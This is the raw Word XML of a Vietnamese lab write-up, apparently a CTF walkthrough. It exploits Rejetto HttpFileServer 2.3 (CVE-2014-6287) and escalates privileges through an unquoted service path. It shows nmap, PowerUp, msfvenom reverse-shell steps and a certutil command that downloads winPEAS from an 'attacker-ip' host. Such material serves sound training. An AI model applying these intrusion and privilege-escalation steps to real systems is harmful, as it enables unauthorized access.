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553AF" w14:textId="6DA90E94" w:rsidR="00CD132F" w:rsidRPr="005E012F" w:rsidRDefault="00CD132F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E012F">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -sC -Pn -A 10.10.108.172</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A14326" w14:textId="77777777" w:rsidR="00CD132F" w:rsidRPr="00CD132F" w:rsidRDefault="00CD132F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F6609B" w14:textId="0A99B431" w:rsidR="002F49FE" w:rsidRDefault="00363143">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CE145C2" wp14:editId="7015D80A">
            <wp:extent cx="5943600" cy="5571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75CC" w14:textId="048DDD38" w:rsidR="00CD132F" w:rsidRDefault="00CD132F"/>
    <w:p w14:paraId="516C531B" w14:textId="795D3C89" w:rsidR="00CD132F" w:rsidRDefault="00CD132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Có 1 máy chủ web hoạt động ở cổng 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E85F97" w14:textId="55A7D53B" w:rsidR="00CD132F" w:rsidRDefault="00CD132F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22AC2D2D" w14:textId="6A8160C1" w:rsidR="00CD132F" w:rsidRDefault="00CD132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Có 1 máy chủ web khác hoạt động ở cổng 8080: HttpFileServer httpd 2.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0069C700" w14:textId="7503FA47" w:rsidR="00CD132F" w:rsidRDefault="00CD132F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A5673D" w14:textId="1881E1C4" w:rsidR="00CD132F" w:rsidRDefault="00CD132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Máy chủ file đang chạy là: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD132F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rejetto http file server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> có lỗ hổng thực thi từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BED5AC" w14:textId="39180D8A" w:rsidR="00CD132F" w:rsidRDefault="00CD132F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616CEFF9" w14:textId="15BF6158" w:rsidR="00CD132F" w:rsidRDefault="00BE6C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CVE: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE6C13">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2014-6287</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A06356C" w14:textId="0B3C62E1" w:rsidR="00BE6C13" w:rsidRDefault="00BE6C13">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26AA01C5" w14:textId="378AF402" w:rsidR="00BE6C13" w:rsidRDefault="00BE51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3E0785" wp14:editId="43268361">
            <wp:extent cx="5943600" cy="1337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CD69" w14:textId="2138296F" w:rsidR="00BE5110" w:rsidRDefault="00BE5110">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029A5D92" w14:textId="44570FD5" w:rsidR="00BE5110" w:rsidRDefault="00761D9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31E90F" wp14:editId="37654D66">
            <wp:extent cx="3981545" cy="5393802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95" cy="54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26AF" w14:textId="3C63EC47" w:rsidR="00761D93" w:rsidRDefault="00761D93">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606C3E6D" w14:textId="4549316D" w:rsidR="00761D93" w:rsidRDefault="0054038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8520C6" wp14:editId="76C1F4AC">
            <wp:extent cx="5943600" cy="2532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F146" w14:textId="46A9D9A1" w:rsidR="00926E21" w:rsidRDefault="00926E21">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D0ECF19" w14:textId="7DBA4235" w:rsidR="00926E21" w:rsidRDefault="00926E2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8ADCFE" wp14:editId="39F7B7A8">
            <wp:extent cx="3225800" cy="39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227C" w14:textId="600EAFA2" w:rsidR="0054038C" w:rsidRDefault="0054038C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E74C9B9" w14:textId="34EE5A6D" w:rsidR="0054038C" w:rsidRDefault="00926E2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70FDAFE" wp14:editId="21A4AB37">
            <wp:extent cx="3213100" cy="69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FF8F" w14:textId="48C12C4F" w:rsidR="00CD132F" w:rsidRDefault="00CD132F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35CDB24F" w14:textId="0C37F55C" w:rsidR="004F58B4" w:rsidRDefault="00AF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Để liệt kê máy ảo, chúng ta sẽ dùng script gọi là PowerUp, mục đích là đánh giá máy ảo Windows và xác định sự bất thường - PowerUp giúp xác định các phương hướng leo thang đặc quyền dựa vào cấu hình sai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CC8AC9" w14:textId="16F51BFC" w:rsidR="00AF124A" w:rsidRDefault="00AF124A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="543F59A7" w14:textId="6B099CE6" w:rsidR="00AF124A" w:rsidRDefault="00AF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sẽ dùng lệnh upload của Metasploit để upload script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD51CF0" w14:textId="0CC406EC" w:rsidR="00AF124A" w:rsidRDefault="00AF124A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574A3638" w14:textId="42CE00D5" w:rsidR="00AF124A" w:rsidRDefault="004732C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F7D2E3" wp14:editId="06F36749">
            <wp:extent cx="5943600" cy="1014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D6C0" w14:textId="2BF568C1" w:rsidR="004732C2" w:rsidRDefault="004732C2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C08843" w14:textId="50DD6294" w:rsidR="004732C2" w:rsidRDefault="004A592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Để thực thi script này bằng Meterpreter, mình sẽ </w:t>
      </w:r>
      <w:r w:rsidRPr="004A5922">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">load powershell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">vào trong meterpreter. Sau đó nhập </w:t>
      </w:r>
      <w:r w:rsidRPr="004A5922">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell_shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">để mở 1 interactive </w:t>
      </w:r>
      <w:r w:rsidR="009E1D7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Powershell prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581BB529" w14:textId="3A01C73A" w:rsidR="00124E58" w:rsidRDefault="00124E58">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7144D409" w14:textId="77777777" w:rsidR="00124E58" w:rsidRDefault="00124E58">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435F457B" w14:textId="38F94FDC" w:rsidR="004A5922" w:rsidRDefault="004A5922">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F796C09" w14:textId="1C1C9757" w:rsidR="004A5922" w:rsidRDefault="00B0789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57A2302" wp14:editId="78EEA972">
            <wp:extent cx="3287210" cy="922726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576" cy="92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B2C2" w14:textId="20648143" w:rsidR="00B0789A" w:rsidRDefault="00B0789A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ABFB770" w14:textId="175EFFD2" w:rsidR="00B0789A" w:rsidRDefault="00007C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Invoke-AllChecks là 1 hàm chạy tất cả kiểm tra trong module. Hàm này đưa ra kết quả kiểm tra ở định dạng hữu ích và cung cấp cho chúng ta các phương hướng để leo thang đặc quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3288D9A1" w14:textId="4711D41F" w:rsidR="00007CAC" w:rsidRDefault="00007CAC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61318F1E" w14:textId="2EBD7AF4" w:rsidR="00007CAC" w:rsidRPr="00CD132F" w:rsidRDefault="00007C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Chú ý đến lựa chọn CanRestart được đặt là true. Tên của dịch vụ bị dính lỗ hổng unquoted service path: </w:t>
      </w:r>
      <w:r w:rsidRPr="00007CAC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AdvancedSystemCareService9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCFBFBA" w14:textId="2EAA3ABA" w:rsidR="00363143" w:rsidRDefault="00A76B3D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FB1CE6F" wp14:editId="7B724F1F">
            <wp:extent cx="5474335" cy="110481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69" cy="11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694" w14:textId="17B830C6" w:rsidR="00922C14" w:rsidRDefault="00922C14"/>
    <w:p w14:paraId="1033C9B7" w14:textId="5A5E1FD7" w:rsidR="00922C14" w:rsidRDefault="00922C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Lựa chọn CanRestart cho phép chúng ta khởi động 1 dịch vụ trên hệ thống, thư mục của ứng dụng cũng có thể ghi đè. Chúng ta có thể thay thế 1 ứng dụng hợp lệ thành 1 mã độc, bắt đầu lại dịch vụ, sẽ chạy chương trình của chúng ta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F85937" w14:textId="3D837237" w:rsidR="00922C14" w:rsidRDefault="00922C14">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76C17CA5" w14:textId="56B8DA06" w:rsidR="00922C14" w:rsidRDefault="00E767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Dùng msfvenom để tạo 1 reverse shell dưới dạng tệp thực thi Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C90FD43" w14:textId="3150A817" w:rsidR="00C969DE" w:rsidRDefault="00C969DE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E4D4F65" w14:textId="71CB06A2" w:rsidR="00C969DE" w:rsidRDefault="00C969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F8CC8A" wp14:editId="5AAE3B6D">
            <wp:extent cx="5729468" cy="843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468" cy="8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6433" w14:textId="3AB1D782" w:rsidR="00C969DE" w:rsidRDefault="00C969DE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A57BC2" w14:textId="0A090D28" w:rsidR="00C969DE" w:rsidRDefault="00EA1B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435312" wp14:editId="24D0678F">
            <wp:extent cx="5474825" cy="158629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15" cy="158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7234" w14:textId="70F82017" w:rsidR="00EA1BA2" w:rsidRDefault="00944A5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BAF7E0" wp14:editId="12B2D092">
            <wp:extent cx="5943600" cy="142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1541" w14:textId="23E0450B" w:rsidR="00944A56" w:rsidRDefault="00944A56">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC57628" w14:textId="1188DA06" w:rsidR="00944A56" w:rsidRDefault="00944A5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77C8D6" wp14:editId="61BF45CB">
            <wp:extent cx="5046345" cy="163521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12" cy="165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F49" w14:textId="28A79588" w:rsidR="00944A56" w:rsidRDefault="00944A56">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40205906" w14:textId="20E1D1C9" w:rsidR="00944A56" w:rsidRDefault="00944A5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B4625B" wp14:editId="6D7FC250">
            <wp:extent cx="5046562" cy="171238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491" cy="17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BFB9" w14:textId="68C84490" w:rsidR="00944A56" w:rsidRDefault="00944A56">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65FB2A2B" w14:textId="76E77225" w:rsidR="00944A56" w:rsidRDefault="00944A5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2F2E1A" wp14:editId="55DF74AC">
            <wp:extent cx="4734046" cy="146609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226" cy="146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FFD6" w14:textId="0088B789" w:rsidR="00944A56" w:rsidRDefault="00944A56">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17F5C130" w14:textId="113081AA" w:rsidR="00944A56" w:rsidRDefault="0035768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13A65D" wp14:editId="725DF60E">
            <wp:extent cx="4038600" cy="584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7D7" w14:textId="2F98811C" w:rsidR="005E012F" w:rsidRDefault="005E012F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089DE1A2" w14:textId="75122F69" w:rsidR="005E012F" w:rsidRDefault="005E012F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E012F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Truy cập và leo thang đặc quyền không có Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B1BCEA" w14:textId="1EA93AE5" w:rsidR="005E012F" w:rsidRDefault="005E012F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FBFB9DF" w14:textId="2465D1BD" w:rsidR="0035768B" w:rsidRDefault="00182A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dùng script của CVE</w:t>
      </w:r>
      <w:r w:rsidR="00895D4A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, chỉnh sửa: localhost: 10.8.55.148, lport: 1234 (port để lắng nghe reverse shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712C12C1" w14:textId="42D860D0" w:rsidR="00895D4A" w:rsidRDefault="00895D4A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2872F5CE" w14:textId="77777777" w:rsidR="00895D4A" w:rsidRDefault="00895D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Tải file nc.exe,  mở 1 máy chủ web: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607F55EB" w14:textId="77777777" w:rsidR="00895D4A" w:rsidRDefault="00895D4A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3290BA27" w14:textId="101007CB" w:rsidR="00E767B9" w:rsidRPr="0053357C" w:rsidRDefault="00895D4A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053357C">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215244BD" w14:textId="5207AE0B" w:rsidR="00363143" w:rsidRDefault="00895D4A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="359F4952" wp14:editId="0EF0A15E">
            <wp:extent cx="5943600" cy="1697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B7C9" w14:textId="7C13610C" w:rsidR="00895D4A" w:rsidRDefault="00895D4A"/>
    <w:p w14:paraId="0E7F110F" w14:textId="23CF7216" w:rsidR="00895D4A" w:rsidRDefault="00895D4A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72708954" wp14:editId="4E70786F">
            <wp:extent cx="5943600" cy="1388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7095" w14:textId="23E405FB" w:rsidR="007C4D92" w:rsidRDefault="007C4D92"/>
    <w:p w14:paraId="7DC63FB4" w14:textId="77777777" w:rsidR="007C4D92" w:rsidRDefault="007C4D92"/>
    <w:p w14:paraId="632C8A71" w14:textId="70459EF0" w:rsidR="00DA32A5" w:rsidRDefault="00DA32A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Lệnh này giúp bạn tải file trong command prompt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD51864" w14:textId="1D47B662" w:rsidR="00895D4A" w:rsidRPr="00DA32A5" w:rsidRDefault="00147F74">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA32A5">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>certutil -urlcache -split -f http://</w:t>
      </w:r>
      <w:r w:rsidR="00DA32A5" w:rsidRPr="00DA32A5">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attacker-ip/winPEASx64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F28E20A" w14:textId="736CBE4C" w:rsidR="00DA32A5" w:rsidRPr="00147F74" w:rsidRDefault="00DA32A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="234FFABF" w14:textId="0397FFEC" w:rsidR="00895D4A" w:rsidRDefault="00147F74">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7161414F" wp14:editId="4878F5D4">
            <wp:extent cx="5943600" cy="942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B33C" w14:textId="6885EEF8" w:rsidR="00FF5DA2" w:rsidRDefault="00FF5DA2"/>
    <w:p w14:paraId="752D88C4" w14:textId="524BE8D0" w:rsidR="00FF5DA2" w:rsidRDefault="00FF5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Khi chạy WinPEAS, bạn sẽ thấy lỗ hổng Unquoted Service Path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452F459C" w14:textId="418E478A" w:rsidR="00FF5DA2" w:rsidRDefault="00FF5DA2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A5B591F" w14:textId="56349A48" w:rsidR="00FF5DA2" w:rsidRDefault="00FF5D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75132B" wp14:editId="47BDC4D2">
            <wp:extent cx="5943600" cy="1741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AEDF" w14:textId="5D5EAB63" w:rsidR="00FF5DA2" w:rsidRDefault="00FF5DA2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13E1DB05" w14:textId="358F813E" w:rsidR="00FF5DA2" w:rsidRPr="00FF5DA2" w:rsidRDefault="00877F0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Tạo payload reverse shell bằng msfvenom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E885AF5" w14:textId="4D3FEABF" w:rsidR="00DA32A5" w:rsidRDefault="00877F0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="281D736F" wp14:editId="18D35EA6">
            <wp:extent cx="5943600" cy="1322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325D" w14:textId="5D5DE723" w:rsidR="00DA32A5" w:rsidRDefault="00DA32A5"/>
    <w:p w14:paraId="76790BB8" w14:textId="1B764AFC" w:rsidR="00877F0B" w:rsidRDefault="00DB530F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB530F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tải file trên máy nạn nhân:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2427713A" w14:textId="182F8315" w:rsidR="00DB530F" w:rsidRDefault="00DB530F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C47B44" w14:textId="3C4D74E5" w:rsidR="00DB530F" w:rsidRDefault="00B64ED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FFC99E" wp14:editId="1C07319E">
            <wp:extent cx="5943600" cy="9378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478B" w14:textId="0DE74484" w:rsidR="00EF2676" w:rsidRDefault="00EF2676">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C3C2516" w14:textId="7DE63634" w:rsidR="00EF2676" w:rsidRDefault="00EF267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Cách di chuyển file trong cmd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA5265" w14:textId="1DF79694" w:rsidR="00EF2676" w:rsidRDefault="00EF2676">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5873D9" w14:textId="6D7622DC" w:rsidR="00EF2676" w:rsidRDefault="00533B1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B6AE158" wp14:editId="170D1F4A">
            <wp:extent cx="5943600" cy="8204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4EFA" w14:textId="53F6ACCD" w:rsidR="00533B1B" w:rsidRDefault="00533B1B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39502876" w14:textId="3B8E30D1" w:rsidR="00533B1B" w:rsidRDefault="00533B1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Bạn mở 1 listener ở máy cục bộ và khởi động lại dịch vụ để bắt reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F3941F" w14:textId="13864D12" w:rsidR="00533B1B" w:rsidRDefault="00533B1B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22475CEB" w14:textId="453F79CD" w:rsidR="00533B1B" w:rsidRDefault="00BE18C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B83BC52" wp14:editId="4D6CB1C3">
            <wp:extent cx="4664597" cy="157180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53" cy="157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9746" w14:textId="76281E2F" w:rsidR="00BE18CD" w:rsidRDefault="00BE18CD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1AF565" w14:textId="51162917" w:rsidR="00BE18CD" w:rsidRDefault="00BE18C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45D688" wp14:editId="6E55EDD9">
            <wp:extent cx="5127585" cy="1913531"/>
            <wp:effectExtent l="0" t="0" r="381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706" cy="19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2B0D" w14:textId="78076770" w:rsidR="00FE5CFE" w:rsidRDefault="00FE5CFE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F182C19" w14:textId="748D9956" w:rsidR="00FE5CFE" w:rsidRDefault="00FE5C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Bạn muốn xem thông tin về 1 dịch vụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774068C8" w14:textId="7D00BA43" w:rsidR="00FE5CFE" w:rsidRDefault="00FE5CFE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF6950D" w14:textId="53C24BF2" w:rsidR="00FE5CFE" w:rsidRDefault="00FE5CF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52F7EE" wp14:editId="0279B849">
            <wp:extent cx="5440101" cy="186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302" cy="18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6EE2" w14:textId="72F2CA7C" w:rsidR="004E2298" w:rsidRDefault="004E2298">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="674EF6F3" w14:textId="2F73852D" w:rsidR="004E2298" w:rsidRDefault="004E22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Bạn muốn xem đặc quyền của 1 thư mục:</w:t>
      </w:r>
    </w:p>
